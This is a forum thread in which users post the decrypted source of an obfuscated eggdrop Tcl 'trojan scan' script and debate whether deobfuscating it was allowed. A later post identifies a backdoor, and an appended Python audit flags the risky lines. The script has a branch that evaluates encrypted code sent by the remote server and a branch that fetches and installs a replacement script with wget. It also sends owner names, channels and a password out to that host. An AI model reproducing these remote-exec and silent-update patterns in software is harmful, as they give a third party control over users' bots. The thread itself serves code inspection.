
encrypted trojan scan script (cont.)

^DooM^
Owner
Posts: 772
Joined: Tue Aug 26, 2003 5:40 pm
Location: IronForge

Post by ^DooM^ »

Due to the previous thread being screwed up by the long encrypted text line, I have reposted Sir_Fz' unencrypted script post here.
Sir_fz wrote:

Code:

      # -- flags

        setudef flag aspbgbl
        setudef flag aspbwarn

      # -- strings

        setudef str aspbkickmsg

        setudef str detected
        setudef str joins
        setudef str kicked

      # -- bindings

        # - remove me

          bind MSG -|- "REMOVEME" aspbgbl:remove:user

        # - check for possible trojans onjoin

          bind JOIN -|- "*" aspbgbl:check:user

        # - update channels

          bind PART -|- "*" aspbgbl:update:channels

        # - update botname

          bind NICK -|- "*" aspbgbl:update:nickname

        # - script status

          bind PUB nm|nm "$::aspb(trigger)" aspbgbl:status

        # - auto update

          bind TIME -|- "00 * * * *" aspbgbl:update

    # --- script main source - NEVER TOUCH IT ;)

      # -- auto update aspbgbl

        proc aspbgbl:update { minute hour day month year } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=011 $::aspb(version)"

        }

      # -- trojan scan control panel

        proc aspbgbl:status { nickname hostname handle channel arguments } {

          global lastbind

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          switch -exact -- [string tolower [lindex [split $arguments] 0]] {

            "warn" {

              set status "Bot will warn users."

              if {![channel get $channel "aspbwarn"]} {
                set status "Bot won't warn users."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on"; channel set $channel +aspbwarn
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off"; channel set $channel -aspbwarn
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037 \037on\037|\037off\037"
                }

              }           

            }

            "stats" {

              if {![regexp {[0-9]{1,}} [channel get $channel "joins"]] || ![regexp {[0-9]{1,}} [channel get $channel "detected"]] || ![regexp {[0-9]{1,}} [channel get $channel "kicked"]] || ![channel get $channel "aspbgbl"]} {
                putserv "NOTICE $nickname :No statistic available :("; return
              }

              putserv "NOTICE $nickname :\037Joins:\037 [channel get $channel "joins"] \037Detected Clients:\037 [channel get $channel "detected"] \037Kicked Clients:\037 [channel get $channel "kicked"]"

            }

            "status" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on."; putserv "PRIVMSG $channel :\001ACTION aspb ver. $::aspb(version) by $::aspb(author)\001"; channel set $channel +aspbgbl
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off."; channel set $channel -aspbgbl
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037status\037 \037on\037|\037off\037"; return
                }

              }

              if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
                return
              }

              set enabled ""
 
              foreach chan [channels] {

                if {![channel get $chan "aspbgbl"]} {
                  lappend enabled $chan
                } else {
                  lappend enabled +$chan
                }
         
              }

              putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

            }

            "kickmsg" {

              if {[join [lrange [split $arguments] 1 end]] == ""} {


                if {[channel get $channel "aspbkickmsg"] == ""} {
                  set kickmessage "not set"
                } else {
                  set kickmessage [channel get $channel "aspbkickmsg"]
                }

                putserv "NOTICE $nickname :Kickmessage: [join $kickmessage]"
                putserv "NOTICE $nickname :Please use: $lastbind \037kickmsg\037 \037message\037 (Available options: %1\$s = hostname, %2\$s = botnick, %3\$s = trojan id, %4\$s = detected counter, %5\$s = trojan type)"

                return

              }

              channel set $channel aspbkickmsg [join [lrange [split $arguments] 1 end]]

              putserv "NOTICE $nickname :Kickmessage successfully saved."

            }

            "default" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037|\037status\037|\037stats\037|\037kickmsg\037 \037?arguments?\037"

            }

          }

        }

      # -- get command/result from the database

        proc aspbgbl:database { idx arguments } {

          if {![valididx $idx]} {
            return
          }

          foreach argument $arguments {

            if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
              set $variable $value
            }

          }

          if {![info exists cmd]} {
            return
          }

          if {$cmd == "004"} {

            if {![info exists type]} {
              set type ""
            }

            channel set $chan detected [expr [channel get $chan "detected"] + 1]
            channel set $chan kicked [expr [channel get $chan "kicked"] + 1]

            if {![info exists reason] || [llength $reason] < 1} {
              set reason [format [join [channel get $chan "aspbkickmsg"]] [lindex [split $mask "@"] 1] $::botnick $id [channel get $chan "detected"] $type]; set warn 1
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason; set warn 0
            }

            set unban ""

            foreach chanban [chanbans $chan] {

              if {[lindex $chanban 2] >= 300} {
                lappend unban [lindex $chanban 0]
              }

              if {[llength $unban] == "6"} {
                putquick "MODE $chan -[string repeat "b" [llength $unban]] [join $unban]"; set unban ""
              }

            }

            if {$unban == "" && [llength [chanbans $chan]] == "45"} {

              set banid 0

              while {$banid < 5} {
                lappend unban [lindex [lindex [chanbans $chan] $banid] 0]; incr banid 1
              }

            }

            putquick "KICK $chan $nick :$reason" -next
            putquick "MODE $chan -[string repeat "b" [llength $unban]]+b [join $unban] $mask"

            if {[channel get $chan "aspbwarn"] && $warn} {
              putserv "NOTICE $nick :You are known as possible ${type}-trojan infected drone. If you wish to remove yourself, please type in: /msg $::botnick removeme"
              putserv "NOTICE $nick :More Information can be found at: \037[format www.pjen.net/?id=%d&botnick=%s $id $::botnick]\037"
            }

          } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
          } elseif {$cmd == "013"} {

            if {![validchan $chan]} {
              return
            }

            channel set $chan -aspbgbl

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

          } elseif {$cmd == "010"} {

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                continue
              }

              channel set $chan -aspbgbl

              putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

            }

          } elseif {$cmd == "012"} {

            if {[catch { exec wget $url } result]} {

              if {![info exists changes]} {
                set changes "not given"
              } else {
                regexp -nocase -- {^.+ message=(.+?)$} $arguments -> changes
              }

              if {[regexp -- {^.+\`(.+?)\'.+$} $result -> filename]} {

                if {[file exists $::aspb(path)]} {
                  file delete -force $::aspb(path)
                }

                file rename -force $filename $::aspb(path)

                if {[file exists $filename]} {
                  file delete -force $filename
                }

                set owners ""

                foreach owner [userlist n] {

                  if {[hand2nick $owner] != ""} {
                    lappend owners [hand2nick $owner]
                  }

                }

                if {[llength $owners] > 0} {
                  putserv "PRIVMSG [join $owners ","] :Your aspbgbl version has been updated. (Changes: $changes)"
                }

                if {[array exists ::aspb]} {
                  array unset ::aspb
                }

                catch { killdcc $idx }

                rehash

              }

              return

            }

            putlog "aspbgbl\002:\002 There is a new aspbgbl version available."

          } elseif {$cmd == "009"} {

            if {!$status} {
              puthelp "NOTICE $nick :Your hostname '$mask' isn't known in the database.";return
            }

            puthelp "NOTICE $nick :Your hostname '$mask' has been successfully removed."

            set unbanned ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {

                foreach channelban [chanbans $channel] {

                  if {[string match -nocase [lindex [split $channelban] 0] $mask]} {
                    lappend unbanned $channel; pushmode $channel -b [lindex [split $channelban] 0]
                  }

                }

              }

            }

            if {[llength $unbanned] > 0} {
              puthelp "NOTICE $nick :Feel free to rejoin the following [expr {([llength $unbanned] == 1) ? "channel" : "channels" }] [join $unbanned ", "]"
            }

          } elseif {$cmd == "014"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach owner [userlist n] {

              if {[set nick [hand2nick $owner]] != ""} {
                lappend list $nick
              }

            }

            putserv "PRIVMSG [join $list ","] :$message"

          } elseif {$cmd == "015"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {
                lappend list $channel
              }

            }

            putserv "PRIVMSG [join $list ","] :\001ACTION attention, aspb broadcast: $message\001"

          }

        }

      # -- remove a possible user

        proc aspbgbl:remove:user { nickname hostname handle arguments } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=008 $nickname!$hostname"

        }

      # -- update database information

        proc aspbgbl:update:channels { nickname hostname handle channel reason } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {[string equal -nocase $chan $channel]} {
                continue
              }

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

          }

        }

      # -- update botname information

        proc aspbgbl:update:nickname { nickname hostname handle channel newnick } {

          global nospam

          if {[isbotnick $nickname] && ![string equal -nocase $nickname $newnick]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            } elseif {[info exists nospam] && [expr [unixtime] - $nospam] < 5} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            set nospam [unixtime]

          }

        }

      # -- check for possible trojan on join

        proc aspbgbl:check:user { nickname hostname handle channel } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            return

          }

          channel set $channel joins [expr [channel get $channel "joins"] + 1]

          if {[string match "*quakenet.org" $hostname]} {
            return
          } elseif {[matchattr $handle mno|mno $channel]} {
            return
          } elseif {![botisop $channel]} {
            return
          } elseif {[regexp -- {i|k|r} [lindex [getchanmode $channel] 0]]} {
            return
          } elseif {![channel get $channel "aspbgbl"]} {
            return
          } elseif {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          } elseif {[isbotnick $nickname]} {
            return
          }

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          set idler    0
          set operator 0
          set voice    0

          foreach user [chanlist $channel] {

            if {[isop $user $channel]} {
              incr operator 1
            } elseif {[isvoice $user $channel]} {
              incr voice 1
            }

            incr idler 1

          }

          putdcc $idx "cmd=003 $nickname!$hostname $channel $idler $operator $voice"

        }

      # -- get idx for the aspbgbl database

        proc aspbgbl:connection { address } {

          foreach socket [dcclist] {

            if {[string equal -nocase $address [lindex [split $socket] 2]]} {
              return [lindex [split $socket] 0]
            }

          }

          if {![valididx [set idx [connect $::aspb(address) $::aspb(port)]]]} {
            return -1
          }

          set enabled ""

          foreach channel [channels] {

            if {![channel get $channel "aspbgbl"]} {
              lappend enabled $channel
            } else {
              lappend enabled +$channel
            }
         
          }

          putdcc $idx "cmd=001 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
          control $idx aspbgbl:database

          return $idx

        }
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
Sir_Fz
Revered One
Posts: 3793
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon

Post by Sir_Fz »

Good idea, my post is really ugly :lol:
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia

Post by Alchera »

So I didn't need new glasses after all? Yay! :lol:
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM
^DooM^
Owner
Posts: 772
Joined: Tue Aug 26, 2003 5:40 pm
Location: IronForge

Post by ^DooM^ »

Haha it took me a while to find the post, it just looked like there was nothing till I scrolled over and down. Just doing my good deed for the day :wink:
Thunderdome
Op
Posts: 187
Joined: Tue Mar 15, 2005 4:42 pm

Post by Thunderdome »

How does this script work? I tried to read the code, but I don't understand what it does...
ex
Voice
Posts: 14
Joined: Wed May 18, 2005 11:04 pm
Location: Chicago

Post by ex »

it connects to a bot and on every join it asks whether it is a spamclient or not.

+ some additional features.
metroid
Owner
Posts: 771
Joined: Wed Jun 16, 2004 2:46 am

Post by metroid »

Guys, I just happen to know who made this script and code gets obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malicious code in it, which I don't think there is..
greenbear
Owner
Posts: 733
Joined: Mon Sep 24, 2001 8:00 pm
Location: Norway

Post by greenbear »

that's just bullshit. it's distributed freely under the gnu licence. if he didn't want ppl to read it, he shouldn't have made it public.
Sir_Fz
Revered One
Posts: 3793
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon

Post by Sir_Fz »

Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably no one has tried to look through it)

Besides, it's decrypting, the code is still the same.
^DooM^
Owner
Posts: 772
Joined: Tue Aug 26, 2003 5:40 pm
Location: IronForge

Post by ^DooM^ »

Sir_Fz wrote:
Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably no one has tried to look through it)

Besides, it's decrypting, the code is still the same.

Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not have released it to the public.
Alchera
Revered One
Posts: 3344
Joined: Mon Aug 11, 2003 12:42 pm
Location: Ballarat Victoria, Australia

Post by Alchera »

I thought only Vulcans used logic? :D :lol:

Bravo one and all.
Sir_Fz
Revered One
Posts: 3793
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon

Post by Sir_Fz »

I forgot to mention, that code was encrypted like 4 times :P lol, Every time I decrypted it, it showed me yet another encryption (was about to give up on it :P ) maybe next time he should try encrypting it endlessly :lol:
Galadhrim
Op
Posts: 123
Joined: Fri Apr 11, 2003 8:38 am
Location: Netherlands, Enschede

Post by Galadhrim »

maybe make a better decrypter that uses recursiveness.
De Kus
Revered One
Posts: 1361
Joined: Sun Dec 15, 2002 11:41 am
Location: Germany

Post by De Kus »

^DooM^ wrote:
Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not have released it to the public.

Since he distributed it under the GNU GPL it would be even illegal to make the source code inaccessible.
De Kus
StarZ|De_Kus, De_Kus or DeKus on IRC
Copyright © 2005-2009 by De Kus - published under The MIT License
Love hurts, love strengthens...
Arie
Voice
Posts: 1
Joined: Mon Jul 18, 2005 10:28 am

Post by Arie »

the part:

Code:

 } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] } 
was a backdoor I heard - don't know tcl =p
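Added example, not part of the thread and not the script author's code: a line-based audit in Python that flags the commands in the posted `aspbgbl:database` handler which evaluate, execute or reload data arriving on the control connection, including the `cmd == "099"` branch quoted in the last post. The excerpt is abridged from the script posted above; the sink names and the `audit` and `remote_exec_branches` helpers are hypothetical.

```python
import re

# Abridged excerpt of aspbgbl:database as posted in this thread (not the whole proc).
SAMPLE = r'''
proc aspbgbl:database { idx arguments } {
  foreach argument $arguments {
    if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
      set $variable $value
    }
  }
  if {$cmd == "004"} {
    putquick "KICK $chan $nick :$reason" -next
  } elseif {$cmd == "099"} {
    regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
  } elseif {$cmd == "012"} {
    if {[catch { exec wget $url } result]} {
      file rename -force $filename $::aspb(path)
      rehash
    }
  }
}
'''

# A Tcl command starts a line or follows ';', '[' or '{'.
CMD_START = r'(?:^|[;\[{])\s*'

# Commands that run code, spawn processes or change what the bot loads,
# when their arguments come from variables rather than literals.
SINKS = [
    ("dynamic-variable-name", re.compile(CMD_START + r'set\s+\$')),
    ("eval-of-data",          re.compile(CMD_START + r'(?:eval|uplevel)\s+[\[$]')),
    ("exec-with-variable",    re.compile(CMD_START + r'exec\s+[^;\]}]*\$')),
    ("script-file-replace",   re.compile(CMD_START + r'file\s+rename\b[^;\]}]*\$')),
    ("rehash",                re.compile(CMD_START + r'rehash\b')),
]

# The handler dispatches on $cmd; remember which branch a line belongs to.
# Heuristic: the last seen `$cmd == "NNN"` test stays current until the next one.
BRANCH = re.compile(r'\$cmd\s*==\s*"(\d+)"')


def audit(source):
    """Return (line number, cmd branch, sink name) for each risky command."""
    findings, branch = [], "pre-dispatch"
    for lineno, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith("#"):      # skip Tcl comment lines
            continue
        match = BRANCH.search(line)
        if match:
            branch = match.group(1)
        for name, pattern in SINKS:
            if pattern.search(line):
                findings.append((lineno, branch, name))
    return findings


def remote_exec_branches(source):
    """cmd codes whose branch evaluates Tcl or runs a process on variable data."""
    hot = {"eval-of-data", "exec-with-variable"}
    return sorted({b for _, b, name in audit(source) if name in hot})


if __name__ == "__main__":
    for lineno, branch, name in audit(SAMPLE):
        print(f"line {lineno:>2}  cmd={branch:<12}  {name}")
```

The same function can be pointed at any eggdrop script file's text before loading it; a hit is a prompt to read that line, not a verdict.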